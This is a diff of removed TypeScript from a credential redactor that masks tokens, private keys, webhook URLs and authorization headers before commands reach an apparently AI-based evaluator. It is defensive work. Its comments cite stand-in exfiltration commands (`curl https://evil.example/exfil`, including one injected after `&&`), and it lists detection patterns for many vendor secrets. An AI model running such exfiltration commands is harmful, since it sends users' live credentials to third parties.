PEM_FOOTER_RE.lastIndex = 0;
|
|
681
|
-
return out;
|
|
682
|
-
}
|
|
683
|
-
|
|
684
|
-
/**
|
|
685
|
-
* A private-key footer. What survives the complete-block rule is a footer whose
|
|
686
|
-
* header is not in the same string — almost always because the envelope's
|
|
687
|
-
* head/tail cap dropped the header into the omitted middle and kept the last
|
|
688
|
-
* lines of the key in the tail. `redactOrphanFooters` takes those lines.
|
|
689
|
-
*/
|
|
690
|
-
const PEM_FOOTER_RE = /-----END[ A-Z0-9]*PRIVATE KEY(?: BLOCK)?-----/g;
|
|
691
|
-
const BASE64_CHAR = /[A-Za-z0-9+/=]/;
|
|
692
|
-
|
|
693
|
-
/** Length of a JSON-escaped `\n`/`\r`/`\t` (one to four backslashes) ending just before `end`, or 0. */
|
|
694
|
-
function escapeBefore(text: string, end: number): number {
|
|
695
|
-
const c = text[end - 1];
|
|
696
|
-
if (c !== "n" && c !== "r" && c !== "t") return 0;
|
|
697
|
-
let i = end - 1;
|
|
698
|
-
while (i > 0 && text[i - 1] === "\\" && end - i <= 4) i--;
|
|
699
|
-
return i < end - 1 ? end - i : 0;
|
|
700
|
-
}
|
|
701
|
-
|
|
702
|
-
/** Whether only whitespace separates `at` from the start of the text or the envelope's cut marker. */
|
|
703
|
-
function startsAfterCut(text: string, at: number, floor: number): boolean {
|
|
704
|
-
let j = at;
|
|
705
|
-
while (j > floor && /\s/.test(text[j - 1])) j--;
|
|
706
|
-
return j === 0 || text[j - 1] === "…";
|
|
707
|
-
}
|
|
708
|
-
|
|
709
|
-
/**
|
|
710
|
-
* The key lines in front of a footer that has no header, walking back from the
|
|
711
|
-
* footer one line at a time. A line is a whole run of base64 between line
|
|
712
|
-
* separators (real or escaped newlines). Every line must be 16+ characters
|
|
713
|
-
* except two: the one right before the footer (a PEM body's short last line)
|
|
714
|
-
* and one that starts the text or follows the cut marker (a line the cut
|
|
715
|
-
* split). A short last line on its own counts only in that second position
|
|
716
|
-
* too. Prose never qualifies: its lines have spaces in them.
|
|
717
|
-
*
|
|
718
|
-
* Returns where the key material starts, or -1.
|
|
719
|
-
*/
|
|
720
|
-
function orphanKeyStart(text: string, footerAt: number, floor: number): number {
|
|
721
|
-
const lines: Array<{ start: number; len: number }> = [];
|
|
722
|
-
let pos = footerAt;
|
|
723
|
-
for (;;) {
|
|
724
|
-
let j = pos;
|
|
725
|
-
while (j > floor) {
|
|
726
|
-
if (/\s/.test(text[j - 1])) j--;
|
|
727
|
-
else {
|
|
728
|
-
const esc = escapeBefore(text, j);
|
|
729
|
-
if (esc === 0) break;
|
|
730
|
-
j -= esc;
|
|
731
|
-
}
|
|
732
|
-
}
|
|
733
|
-
if (j === pos && lines.length > 0) break;
|
|
734
|
-
let k = j;
|
|
735
|
-
while (k > floor && BASE64_CHAR.test(text[k - 1]) && escapeBefore(text, k) === 0) k--;
|
|
736
|
-
const len = j - k;
|
|
737
|
-
if (len === 0) break;
|
|
738
|
-
// A whole line: it starts the text, or follows a separator, a quote or the cut marker.
|
|
739
|
-
if (k > floor && !/[\s"'`…]/.test(text[k - 1]) && escapeBefore(text, k) === 0) break;
|
|
740
|
-
if (lines.length > 0 && len < 16 && !startsAfterCut(text, k, floor)) break;
|
|
741
|
-
lines.push({ start: k, len });
|
|
742
|
-
pos = k;
|
|
743
|
-
}
|
|
744
|
-
if (lines.length === 0) return -1;
|
|
745
|
-
if (lines.length === 1 && lines[0].len < 16 && !startsAfterCut(text, lines[0].start, floor)) return -1;
|
|
746
|
-
return lines[lines.length - 1].start;
|
|
747
|
-
}
|
|
748
|
-
|
|
749
|
-
/** Redact key lines in front of every footer that lost its header. */
|
|
750
|
-
function redactOrphanFooters(text: string, counter: Counter): string {
|
|
751
|
-
if (!text.includes("-----END")) return text;
|
|
752
|
-
let out = "";
|
|
753
|
-
let last = 0;
|
|
754
|
-
PEM_FOOTER_RE.lastIndex = 0;
|
|
755
|
-
for (let m = PEM_FOOTER_RE.exec(text); m !== null; m = PEM_FOOTER_RE.exec(text)) {
|
|
756
|
-
const start = orphanKeyStart(text, m.index, last);
|
|
757
|
-
if (start < 0) continue;
|
|
758
|
-
const end = m.index + m[0].length;
|
|
759
|
-
out += text.slice(last, start) + marker("private key");
|
|
760
|
-
counter.n++;
|
|
761
|
-
counter.found.push(text.slice(start, end));
|
|
762
|
-
last = end;
|
|
763
|
-
}
|
|
764
|
-
PEM_FOOTER_RE.lastIndex = 0;
|
|
765
|
-
return last === 0 ? text : out + text.slice(last);
|
|
766
|
-
}
|
|
767
|
-
|
|
768
|
-
/**
|
|
769
|
-
* Vendor prefixes the shared list does not carry. They stay OUT of
|
|
770
|
-
* `SECRET_PATTERNS` on purpose: the audit redactor masks `export
|
|
771
|
-
* SLACK_BOT_TOKEN=xoxb-…` as an "assigned secret" and its tests pin that label,
|
|
772
|
-
* and several of these are too new to have earned a blocking rule.
|
|
773
|
-
*/
|
|
774
|
-
const VENDOR_RULES: ReadonlyArray<readonly [RegExp, string]> = (
|
|
775
|
-
[
|
|
776
|
-
[String.raw`gh[pousr]_[A-Za-z0-9]{30,}`, "GitHub token"],
|
|
777
|
-
[String.raw`github_pat_[A-Za-z0-9_]{30,}`, "GitHub fine-grained token"],
|
|
778
|
-
[String.raw`glpat-[A-Za-z0-9_-]{20,}`, "GitLab token"],
|
|
779
|
-
[String.raw`xox[abposr]-[A-Za-z0-9-]{10,}`, "Slack token"],
|
|
780
|
-
[String.raw`xapp-\d-[A-Za-z0-9-]{10,}`, "Slack app token"],
|
|
781
|
-
[String.raw`hf_[A-Za-z0-9]{30,}`, "Hugging Face token"],
|
|
782
|
-
[String.raw`npm_[A-Za-z0-9]{36}`, "npm token"],
|
|
783
|
-
[String.raw`pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_-]{20,}`, "PyPI token"],
|
|
784
|
-
[String.raw`(?:sk|rk)_(?:live|test)_[A-Za-z0-9]{16,}`, "Stripe secret key"],
|
|
785
|
-
[String.raw`whsec_[A-Za-z0-9+/=]{20,}`, "webhook signing secret"],
|
|
786
|
-
[String.raw`ASIA[A-Z0-9]{16}`, "AWS temporary access key ID"],
|
|
787
|
-
[String.raw`ya29\.[A-Za-z0-9_-]{20,}`, "Google OAuth token"],
|
|
788
|
-
[String.raw`GOCSPX-[A-Za-z0-9_-]{20,}`, "Google OAuth client secret"],
|
|
789
|
-
[String.raw`1//0[A-Za-z0-9_-]{30,}`, "Google refresh token"],
|
|
790
|
-
[String.raw`SG\.[A-Za-z0-9_-]{16,}\.[A-Za-z0-9_-]{16,}`, "SendGrid API key"],
|
|
791
|
-
[String.raw`gsk_[A-Za-z0-9]{30,}`, "Groq API key"],
|
|
792
|
-
[String.raw`xai-[A-Za-z0-9]{30,}`, "xAI API key"],
|
|
793
|
-
[String.raw`pplx-[A-Za-z0-9]{30,}`, "Perplexity API key"],
|
|
794
|
-
// `vercel` is one of the five providers a Jev config can name, and
|
|
795
|
-
// `jev-config.ts`'s `CREDENTIAL_PREFIX_RE` already treats `vck_` as a
|
|
796
|
-
// credential shape — so a gateway key pasted into a command was the one
|
|
797
|
-
// vendor prefix this side knew about and still sent. `AI_GATEWAY_API_KEY=…`
|
|
798
|
-
// was caught by the assignment rule; bare in a command it was not.
|
|
799
|
-
[String.raw`vck_[A-Za-z0-9]{24,}`, "Vercel AI Gateway key"],
|
|
800
|
-
[String.raw`r8_[A-Za-z0-9]{30,}`, "Replicate token"],
|
|
801
|
-
[String.raw`sbp_[A-Za-z0-9]{30,}`, "Supabase token"],
|
|
802
|
-
[String.raw`sb_secret_[A-Za-z0-9_-]{16,}`, "Supabase secret key"],
|
|
803
|
-
[String.raw`dapi[0-9a-f]{32}`, "Databricks token"],
|
|
804
|
-
[String.raw`shp(?:at|ca|pa|ss)_[0-9a-fA-F]{32}`, "Shopify token"],
|
|
805
|
-
[String.raw`lin_api_[A-Za-z0-9]{30,}`, "Linear API key"],
|
|
806
|
-
[String.raw`ntn_[A-Za-z0-9]{30,}`, "Notion token"],
|
|
807
|
-
[String.raw`ATATT3[A-Za-z0-9_=-]{30,}`, "Atlassian API token"],
|
|
808
|
-
[String.raw`dp\.(?:st|ct|sa|scim|audit|pt)\.[A-Za-z0-9_-]{30,}`, "Doppler token"],
|
|
809
|
-
[String.raw`tskey-[a-z]+-[A-Za-z0-9-]{16,}`, "Tailscale key"],
|
|
810
|
-
[String.raw`do[oprt]_v1_[a-f0-9]{64}`, "DigitalOcean token"],
|
|
811
|
-
[String.raw`AGE-SECRET-KEY-1[0-9A-Z]{50,}`, "age secret key"],
|
|
812
|
-
// The gateway keys `SECRET_PATTERNS`' `sk-[A-Za-z0-9]{20,}` walks past,
|
|
813
|
-
// because its token class stops at the first `-` or `_`. They belong HERE
|
|
814
|
-
// and not on the shared list: `sanitize-api-keys` answers a match by
|
|
815
|
-
// replacing the whole tool result, so anything on that list which also
|
|
816
|
-
// matches an ordinary hyphenated name (`sk-Release2024-Notes-Final-Draft`,
|
|
817
|
-
// a pod name, a branch, an `ls` row) deletes real output for every user,
|
|
818
|
-
// whether or not they run Jev. On this path a false positive costs Jev a
|
|
819
|
-
// few characters of context, so the generic entry below can be blunt.
|
|
820
|
-
[String.raw`sk-or-v\d+-[A-Za-z0-9]{32,}`, "OpenRouter API key"],
|
|
821
|
-
[String.raw`sk-lf-[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}`, "Langfuse secret key"],
|
|
822
|
-
// Any other `sk-` token, down to the 16 characters the collector's own
|
|
823
|
-
// redactor (crates/fpai-collect/src/redact.rs) uses. Blunter than anything
|
|
824
|
-
// the shared list could carry, and it already covered every hyphenated
|
|
825
|
-
// gateway shape: LiteLLM's `sk-` + token_urlsafe(16), OpenRouter,
|
|
826
|
-
// Langfuse, OpenAI's `sk-svcacct-` / `sk-admin-` / `sk-None-`. The two
|
|
827
|
-
// entries above only give those their own NAME in the marker, which the
|
|
828
|
-
// generic one cannot.
|
|
829
|
-
[String.raw`sk-[A-Za-z0-9_-]{16,}`, "sk- API key"],
|
|
830
|
-
] as const
|
|
831
|
-
).map(([src, label]) => [new RegExp(`${src}[A-Za-z0-9_-]*`, "g"), label] as const);
|
|
832
|
-
|
|
833
|
-
/** Webhook URLs whose path IS the credential. */
|
|
834
|
-
const WEBHOOK_RULES: ReadonlyArray<readonly [RegExp, string]> = [
|
|
835
|
-
[/(hooks\.slack\.com\/(?:services|workflows|triggers)\/)[A-Za-z0-9_/-]{16,}/g, "Slack webhook"],
|
|
836
|
-
[/(discord(?:app)?\.com\/api\/webhooks\/\d+\/)[A-Za-z0-9_-]{20,}/g, "Discord webhook"],
|
|
837
|
-
[/(api\.telegram\.org\/(?:file\/)?bot)\d{6,}:[A-Za-z0-9_-]{30,}/g, "Telegram bot token"],
|
|
838
|
-
];
|
|
839
|
-
|
|
840
|
-
/**
|
|
841
|
-
* `scheme://user:password@host` on ANY scheme; the shared list covers
|
|
842
|
-
* databases only.
|
|
843
|
-
*
|
|
844
|
-
* 1 the token boundary in front of the scheme
|
|
845
|
-
* 2 the scheme 3 the user 4 the password
|
|
846
|
-
*
|
|
847
|
-
* Group 1 is what keeps the scan LINEAR, the same device and the same reason
|
|
848
|
-
* as `ASSIGNMENT_NAME_RE`. A `\b` here matched after every `-` and every `.`,
|
|
849
|
-
* because both are non-word characters, and `[a-z][a-z0-9+.-]*` then consumed
|
|
850
|
-
* the rest of the run and backtracked over it at each of those starts: a
|
|
851
|
-
* 4 000-character run of `a-a-a-…` cost 11 ms, 8 000 cost 45 ms, and the two
|
|
852
|
-
* URL rules together were 44 of the 47 ms the whole redactor spent on it. A
|
|
853
|
-
* boundary character that the scheme itself cannot contain makes every
|
|
854
|
-
* position inside such a run fail in one step. The boundary is consumed rather
|
|
855
|
-
* than looked behind (a lookbehind drops JSC's regex JIT) and re-emitted in
|
|
856
|
-
* front of the replacement. A scheme in a real URL always follows a character
|
|
857
|
-
* outside `[A-Za-z0-9_.+-]` — or starts the string, or a JSON-escaped line.
|
|
858
|
-
*/
|
|
859
|
-
const URL_CREDENTIALS_RE = /(^|\\[nrt]|[^A-Za-z0-9_.+-])([a-z][a-z0-9+.-]*:\/\/)([^\s/@:"'<>]+):([^\s/@"'<>]+)@/gi;
|
|
860
|
-
|
|
861
|
-
/**
|
|
862
|
-
* `scheme://<token>@host`, the shape `git clone https://<token>@github.com/…`
|
|
863
|
-
* uses. Boundary group as in `URL_CREDENTIALS_RE`, for the same reason.
|
|
864
|
-
*/
|
|
865
|
-
const URL_TOKEN_USERINFO_RE = /(^|\\[nrt]|[^A-Za-z0-9_.+-])([a-z][a-z0-9+.-]*:\/\/)([A-Za-z0-9_.~-]{20,})@/gi;
|
|
866
|
-
|
|
867
|
-
/**
|
|
868
|
-
* The header names whose value IS a credential, in every syntax they are
|
|
869
|
-
* written in — and the blunt rule that decides where such a value ends.
|
|
870
|
-
*
|
|
871
|
-
* Five review rounds were spent deciding that end by looking at what the
|
|
872
|
-
* value CONTAINS: a scheme allowlist, a token shape, a "does this look like
|
|
873
|
-
* code" test, a bounded token walk. Every round the next reviewer found three
|
|
874
|
-
* more spellings the classifier declined with a live credential inside them —
|
|
875
|
-
* a credential starting with `-` (base64url's 62nd character) or `/`
|
|
876
|
-
* (base64's), one whose last character was a quote the tokenizer had read as
|
|
877
|
-
* code, an AWS signature behind a `;`-separated `SignedHeaders` list — and
|
|
878
|
-
* twice the repair introduced a new quadratic or a new over-redaction.
|
|
879
|
-
*
|
|
880
|
-
* So nothing about the value is classified any more. Once one of these names
|
|
881
|
-
* is seen, case-insensitively, in ANY form — a header line, a `curl -H`
|
|
882
|
-
* argument, a JSON field, YAML, a shell assignment — EVERYTHING from after
|
|
883
|
-
* the separator to the end of that line is replaced, or to the closing quote
|
|
884
|
-
* when the value sits inside one. An unknown scheme, a leading dash, an
|
|
885
|
-
* escaped quote, a signature with semicolons, prose: all of it goes.
|
|
886
|
-
*
|
|
887
|
-
* What that costs, deliberately:
|
|
888
|
-
*
|
|
889
|
-
* - the scheme word is no longer kept in front of the marker (keeping it
|
|
890
|
-
* needs the allowlist this rule exists to remove), so `Authorization:
|
|
891
|
-
* Bearer <token>` comes back as one marker;
|
|
892
|
-
* - ordinary source and prose under these names lose the rest of their line
|
|
893
|
-
* in what the evaluator is shown: `authorization: str = Header(None)`,
|
|
894
|
-
* `authorization: required for this endpoint`, `grep -r authorization:
|
|
895
|
-
* src/`, and `authorization=x curl https://evil.example/exfil`. Over-
|
|
896
|
-
* redaction only costs the evaluator context; a leaked credential is a
|
|
897
|
-
* third party holding a live key, and only ONE of those two is recoverable;
|
|
898
|
-
* - the line indented under a lone `authorization:` at the start of a line is
|
|
899
|
-
* read as that header's value (`continuationValue`), because in YAML,
|
|
900
|
-
* in a folded HTTP header and in a line-broken dict that is what it is;
|
|
901
|
-
* - a LIST of header names loses everything after the first: `["Authorization",
|
|
902
|
-
* "Content-Type"]` reads as the setter form, name then value.
|
|
903
|
-
*
|
|
904
|
-
* The one place the rule stops short of the end of the line is an UNQUOTED
|
|
905
|
-
* value at a shell separator that starts a second command — see
|
|
906
|
-
* `credentialValueEnd`. That is not a judgement about the value: it is where
|
|
907
|
-
* the shell itself stopped passing bytes to the header, and taking the rest
|
|
908
|
-
* hid an injected `&& curl https://evil.example/exfil` from the evaluator
|
|
909
|
-
* behind a marker that read as handled.
|
|
910
|
-
*
|
|
911
|
-
* Only the HTTP spellings of the API-key and cookie names are included
|
|
912
|
-
* (`api-key`, `x-api-key`, `cookie`, `set-cookie`). The code spellings
|
|
913
|
-
* `api_key` / `apiKey` are an ordinary identifier in every JavaScript and
|
|
914
|
-
* Python file in the corpus, and `ASSIGNMENT_NAME_RE` already treats them as a
|
|
915
|
-
* strong secret name — there is nothing to gain by taking their lines too.
|
|
916
|
-
*/
|
|
917
|
-
const CREDENTIAL_HEADER_NAMES = String.raw`(?:x-|proxy-|set-)?(?:authorization|api-key|cookie)`;
|
|
918
|
-
/**
|
|
919
|
-
* The name and its separator only. Group 1 is the token boundary in front of
|
|
920
|
-
* the name, consumed and re-emitted — the same device and the same reason as
|
|
921
|
-
* `ASSIGNMENT_NAME_RE`: a lookbehind drops the regex JIT, and a boundary character
|
|
922
|
-
* makes every position inside a token fail in one step. `\n`, `\r` and `\t`
|
|
923
|
-
* count because input nested two levels deep is JSON-stringified, where a
|
|
924
|
-
* header at the start of a line follows the two characters `\` `n`.
|
|
925
|
-
*
|
|
926
|
-
* Two separator shapes, because a header is set in two ways:
|
|
927
|
-
*
|
|
928
|
-
* `Authorization: …`, `authorization=…`, `"Authorization": "…"` — a separator
|
|
929
|
-
* `req.Header.Set("Authorization", "…")`, `headers.set("x-api-key", …)`,
|
|
930
|
-
* `xhr.setRequestHeader("Authorization", …)`, `[("x-api-key", "…")]` — a COMMA
|
|
931
|
-
*
|
|
932
|
-
* The comma form requires the closing quote of the name, which is what keeps
|
|
933
|
-
* it off ordinary prose ("the authorization, which expired"): every setter and
|
|
934
|
-
* every tuple writes the name as a string literal. Both alternatives are
|
|
935
|
-
* anchored after the name and consume a bounded run, so the scan stays linear.
|
|
936
|
-
*/
|
|
937
|
-
const CREDENTIAL_HEADER_RE = new RegExp(
|
|
938
|
-
String.raw`(^|\\[nrt]|[^A-Za-z0-9_-])(${CREDENTIAL_HEADER_NAMES})(?:(?:\\?["'])?[ \t]*(?::=|[:=])[ \t]*|(?:\\?["'])[ \t]*,[ \t]*)`,
|
|
939
|
-
"gi",
|
|
940
|
-
);
|
|
941
|
-
/** The same names as a whole field name, for structured input. */
|
|
942
|
-
const CREDENTIAL_FIELD_RE = new RegExp(`^${CREDENTIAL_HEADER_NAMES}$`, "i");
|
|
943
|
-
|
|
944
|
-
/** Which of the three credential headers this name is, for the marker. */
|
|
945
|
-
function credentialHeaderLabel(name: string): string {
|
|
946
|
-
const n = name.toLowerCase();
|
|
947
|
-
if (n.endsWith("cookie")) return "cookie header";
|
|
948
|
-
if (n.endsWith("api-key")) return "api key header";
|
|
949
|
-
return "authorization header";
|
|
950
|
-
}
|
|
951
|
-
|
|
952
|
-
/**
|
|
953
|
-
* Whether this header's value can open with a public SCHEME word (`Bearer`,
|
|
954
|
-
* `AWS4-HMAC-SHA256`). Only `Authorization` and its kin can: a cookie's value
|
|
955
|
-
* starts with the session pair and an API key header holds the key itself, so
|
|
956
|
-
* for those the first piece is the credential.
|
|
957
|
-
*/
|
|
958
|
-
function headerHasScheme(name: string): boolean {
|
|
959
|
-
return credentialHeaderLabel(name) === "authorization header";
|
|
960
|
-
}
|
|
961
|
-
|
|
962
|
-
/**
|
|
963
|
-
* A marker this file already wrote.
|
|
964
|
-
*
|
|
965
|
-
* Rules run from the most exact to the most heuristic, so a credential header
|
|
966
|
-
* can arrive with part of its value already replaced — `Credential=<redacted:AWS
|
|
967
|
-
* access key ID>/20260922, Signature=…` after the shared floor took the access
|
|
968
|
-
* key. Such a value is still redacted whole (the signature behind the marker is
|
|
969
|
-
* a credential), but a value that is NOTHING but markers is already done, which
|
|
970
|
-
* is what makes a second pass over redacted text a no-op.
|
|
971
|
-
*/
|
|
972
|
-
const AUTH_MARKER_HEAD = "<redacted:";
|
|
973
|
-
const AUTH_MARKER_RE = /<redacted:[^>]*>/g;
|
|
974
|
-
const withoutMarkers = (s: string): string => s.replace(AUTH_MARKER_RE, "");
|
|
975
|
-
|
|
976
|
-
/** A token without the shell quotes around it or the punctuation after it. */
|
|
977
|
-
function bareArgument(t: string): string {
|
|
978
|
-
const s = t.replace(/[,;]+$/, "");
|
|
979
|
-
const m = /^(["'])([\s\S]*)\1$/.exec(s);
|
|
980
|
-
// A quote with no partner inside the token belongs to the code AROUND it —
|
|
981
|
-
// `app --password <tok>"` ends at a quote nothing opened — and leaving it on
|
|
982
|
-
// means the secret reported for the scrub pass matches no copy of itself.
|
|
983
|
-
return m ? m[2] : s.replace(/^["']|["']$/g, "");
|
|
984
|
-
}
|
|
985
|
-
|
|
986
|
-
/** Where the scan has got to, and the quote that is open there. */
|
|
987
|
-
interface QuoteCursor {
|
|
988
|
-
pos: number;
|
|
989
|
-
/** The exact delimiter that opened: `"`, `'`, or a JSON-escaped `\"` / `\'`. */
|
|
990
|
-
open: string | null;
|
|
991
|
-
}
|
|
992
|
-
|
|
993
|
-
/**
|
|
994
|
-
* The tail of an English contraction: the one `'` in prose that is not a quote.
|
|
995
|
-
* Bounded to three characters, read off a slice, so the scan stays linear.
|
|
996
|
-
*/
|
|
997
|
-
const CONTRACTION_TAIL_RE = /^(?:s|t|d|m|ll|re|ve)(?![A-Za-z])/i;
|
|
998
|
-
|
|
999
|
-
/**
|
|
1000
|
-
* Whether the `'` at `at` is an apostrophe rather than an opening quote:
|
|
1001
|
-
* `it's`, `don't`, `we're`. A human's message and a file's prose go through
|
|
1002
|
-
* this scanner too, and one contraction used to leave the cursor believing a
|
|
1003
|
-
* string was open for the rest of the line — which disabled the value's own
|
|
1004
|
-
* quote in `sshpass -p 'pw'` and sent the password out verbatim.
|
|
1005
|
-
*
|
|
1006
|
-
* A letter on BOTH sides is not enough (`-p'pw'` has one), so the tail has to
|
|
1007
|
-
* be one of the seven English contraction endings AND end the word there.
|
|
1008
|
-
*/
|
|
1009
|
-
function isApostrophe(text: string, at: number): boolean {
|
|
1010
|
-
const before = text[at - 1];
|
|
1011
|
-
if (before === undefined || !/[A-Za-z]/.test(before)) return false;
|
|
1012
|
-
return CONTRACTION_TAIL_RE.test(text.slice(at + 1, at + 4));
|
|
1013
|
-
}
|
|
1014
|
-
|
|
1015
|
-
/**
|
|
1016
|
-
* Carry the quote state forward to `to`, in ONE pass over each character.
|
|
1017
|
-
*
|
|
1018
|
-
* The header's value ends at the quote the header itself sits inside —
|
|
1019
|
-
* `curl -H "Authorization: …"`, `{"Authorization: …"}`, `['Authorization: …']`
|
|
1020
|
-
* all write the name and the value inside one string — and finding that quote
|
|
1021
|
-
* by scanning BACK from each name is quadratic on a line with many names. The
|
|
1022
|
-
* cursor only ever moves forward, so the whole walk is linear however many
|
|
1023
|
-
* names the line holds. Quote state resets at every real line break, so an
|
|
1024
|
-
* apostrophe in prose cannot make a value on a later line end early — and
|
|
1025
|
-
* where it does confuse the state on its own line, the fallback is the end of
|
|
1026
|
-
* the line, which redacts MORE, not less.
|
|
1027
|
-
*
|
|
1028
|
-
* A JSON-ESCAPED newline resets only a single quote, not a double one. `\n`
|
|
1029
|
-
* inside a double-quoted shell string (`printf "%s\n" "$V"`) is an ordinary
|
|
1030
|
-
* two-character escape, and resetting there made that string's CLOSING quote
|
|
1031
|
-
* read as an opening one: from that point the cursor believed a string was
|
|
1032
|
-
* open, which disabled the separator rule and hid everything after the next
|
|
1033
|
-
* credential name on the line — an injected second command included. A stray
|
|
1034
|
-
* single quote in prose is the case the reset was added for, and that one
|
|
1035
|
-
* still resets.
|
|
1036
|
-
*/
|
|
1037
|
-
function advanceQuotes(text: string, cur: QuoteCursor, to: number): void {
|
|
1038
|
-
let i = cur.pos;
|
|
1039
|
-
while (i < to) {
|
|
1040
|
-
const c = text[i];
|
|
1041
|
-
if (c === "\n" || c === "\r") {
|
|
1042
|
-
cur.open = null;
|
|
1043
|
-
i++;
|
|
1044
|
-
continue;
|
|
1045
|
-
}
|
|
1046
|
-
if (c === "\\") {
|
|
1047
|
-
const n = text[i + 1];
|
|
1048
|
-
if (n === undefined) {
|
|
1049
|
-
i++;
|
|
1050
|
-
continue;
|
|
1051
|
-
}
|
|
1052
|
-
if (n === "n" || n === "r") {
|
|
1053
|
-
if (cur.open === "'" || cur.open === "\\'") cur.open = null;
|
|
1054
|
-
i += 2;
|
|
1055
|
-
continue;
|
|
1056
|
-
}
|
|
1057
|
-
if (n === '"' || n === "'") {
|
|
1058
|
-
const q = c + n;
|
|
1059
|
-
if (cur.open === null) cur.open = q;
|
|
1060
|
-
else if (cur.open === q) cur.open = null;
|
|
1061
|
-
i += 2;
|
|
1062
|
-
continue;
|
|
1063
|
-
}
|
|
1064
|
-
i += 2;
|
|
1065
|
-
continue;
|
|
1066
|
-
}
|
|
1067
|
-
if (c === '"' || (c === "'" && !isApostrophe(text, i))) {
|
|
1068
|
-
if (cur.open === null) cur.open = c;
|
|
1069
|
-
else if (cur.open === c) cur.open = null;
|
|
1070
|
-
i++;
|
|
1071
|
-
continue;
|
|
1072
|
-
}
|
|
1073
|
-
i++;
|
|
1074
|
-
}
|
|
1075
|
-
cur.pos = i;
|
|
1076
|
-
}
|
|
1077
|
-
|
|
1078
|
-
/**
|
|
1079
|
-
* The delimiter a VALUE opens at `start`, or null when it opens none.
|
|
1080
|
-
*
|
|
1081
|
-
* The enclosing delimiter is never one. In `{"command": "app --password pw"}`
|
|
1082
|
-
* the `"` after `pw` closes the JSON string the command sits in, and taking it
|
|
1083
|
-
* as the value's own quote put `pw"}` on the scrub list; but in
|
|
1084
|
-
* `{"command": "app --password \"pw\""}` the value's own delimiter is the
|
|
1085
|
-
* escaped `\"`, and in `… -p 'pw' …` it is the `'` — and skipping those
|
|
1086
|
-
* because SOMETHING was open truncated the credential at the first space,
|
|
1087
|
-
* reduced it to a single backslash, or left it in the request in clear.
|
|
1088
|
-
*/
|
|
1089
|
-
function valueOwnQuote(text: string, start: number, close: string | null): string | null {
|
|
1090
|
-
const d = escapedQuoteRun(text, start);
|
|
1091
|
-
if (d === null) return null;
|
|
1092
|
-
if (d !== close) return d;
|
|
1093
|
-
// Spelled exactly like the enclosing delimiter. Identity alone cannot decide
|
|
1094
|
-
// this: `{"command": "app --password pw"}` really does end at the JSON quote,
|
|
1095
|
-
// but a payload JSON-stringified twice writes `\"` for both, and declining
|
|
1096
|
-
// there read the argument as empty and sent the password out in clear. So ask
|
|
1097
|
-
// the text instead — a delimiter that has a partner on this line, with a value
|
|
1098
|
-
// boundary behind it, opened the value.
|
|
1099
|
-
return closesOnThisLine(text, start + d.length, d) ? d : null;
|
|
1100
|
-
}
|
|
1101
|
-
|
|
1102
|
-
/**
|
|
1103
|
-
* The quote delimiter written at `at`, with the backslashes that escape it, or
|
|
1104
|
-
* null when nothing there opens or closes a string.
|
|
1105
|
-
*
|
|
1106
|
-
* Every level of JSON nesting DOUBLES the backslashes in front of a quote: a
|
|
1107
|
-
* `"` in a command is `\"` inside one JSON string and `\\\"` inside two, which
|
|
1108
|
-
* is the shape `cleanValue` gives any object at depth >= 2. Reading exactly one
|
|
1109
|
-
* backslash matched neither the twice-encoded form nor anything deeper, so a
|
|
1110
|
-
* quoted credential argument in a nested tool call reached the request whole.
|
|
1111
|
-
*
|
|
1112
|
-
* One walk over the run's own characters, and runs at different positions are
|
|
1113
|
-
* different characters, so the scan stays linear however many a line holds.
|
|
1114
|
-
*/
|
|
1115
|
-
function escapedQuoteRun(text: string, at: number): string | null {
|
|
1116
|
-
let i = at;
|
|
1117
|
-
while (text[i] === "\\") i++;
|
|
1118
|
-
const q = text[i];
|
|
1119
|
-
if (q !== '"' && q !== "'") return null;
|
|
1120
|
-
return text.slice(at, i + 1);
|
|
1121
|
-
}
|
|
1122
|
-
|
|
1123
|
-
/**
|
|
1124
|
-
* Whether a value that opens at `from` is closed by a second copy of `d` on
|
|
1125
|
-
* the same line, with a value boundary behind it.
|
|
1126
|
-
*
|
|
1127
|
-
* The scan stops at the FIRST copy, whatever the answer, which is what keeps
|
|
1128
|
-
* it linear: a line of `N` credential flags costs one pass over the text
|
|
1129
|
-
* between consecutive delimiters, not `N` passes over the whole line. A `d`
|
|
1130
|
-
* that is not there before the line break says no, and the caller then falls
|
|
1131
|
-
* back to the bare-argument walk, exactly as it did before.
|
|
1132
|
-
*/
|
|
1133
|
-
function closesOnThisLine(text: string, from: number, d: string): boolean {
|
|
1134
|
-
for (let i = from; i < text.length; i++) {
|
|
1135
|
-
if (text.startsWith(d, i)) {
|
|
1136
|
-
// A quote that closed the value, OR the ENCLOSING delimiter written
|
|
1137
|
-
// straight behind it with nothing in between — `… --password \"pw\""}`
|
|
1138
|
-
// ends the argument and the JSON string around it at once, and asking
|
|
1139
|
-
// for whitespace or a bracket there declined the whole argument and
|
|
1140
|
-
// sent the password out. A letter behind it is still not a close, which
|
|
1141
|
-
// is what keeps `echo "use --password" ; echo "other"` untouched.
|
|
1142
|
-
return quoteClosesValue(text, i, d) || escapedQuoteRun(text, i + d.length) !== null;
|
|
1143
|
-
}
|
|
1144
|
-
const c = text[i];
|
|
1145
|
-
if (c === "\n" || c === "\r") return false;
|
|
1146
|
-
if (c === "\\" && (text[i + 1] === "n" || text[i + 1] === "r")) return false;
|
|
1147
|
-
}
|
|
1148
|
-
return false;
|
|
1149
|
-
}
|
|
1150
|
-
|
|
1151
|
-
/** What may follow a quote that really closed the value around it. */
|
|
1152
|
-
const VALUE_CLOSED_BY = /[\s,;&|}\])]/;
|
|
1153
|
-
|
|
1154
|
-
/**
|
|
1155
|
-
* Whether the quote at `at` closes the value, or is one the shell glues to
|
|
1156
|
-
* more of the same argument: `curl -H "Authorization: hmac "$PW"" https://x`
|
|
1157
|
-
* is ONE header value in three quoted pieces, and stopping at the first of
|
|
1158
|
-
* them sends the rest of it to Jev. A quote that closed something is followed
|
|
1159
|
-
* by whitespace, a separator, a closing bracket or the end of the text.
|
|
1160
|
-
*/
|
|
1161
|
-
function quoteClosesValue(text: string, at: number, close: string): boolean {
|
|
1162
|
-
const after = at + close.length;
|
|
1163
|
-
const c = text[after];
|
|
1164
|
-
if (c === undefined) return true;
|
|
1165
|
-
if (VALUE_CLOSED_BY.test(c)) return true;
|
|
1166
|
-
return c === "\\" && /[nr]/.test(text[after + 1] ?? "");
|
|
1167
|
-
}
|
|
1168
|
-
|
|
1169
|
-
/**
|
|
1170
|
-
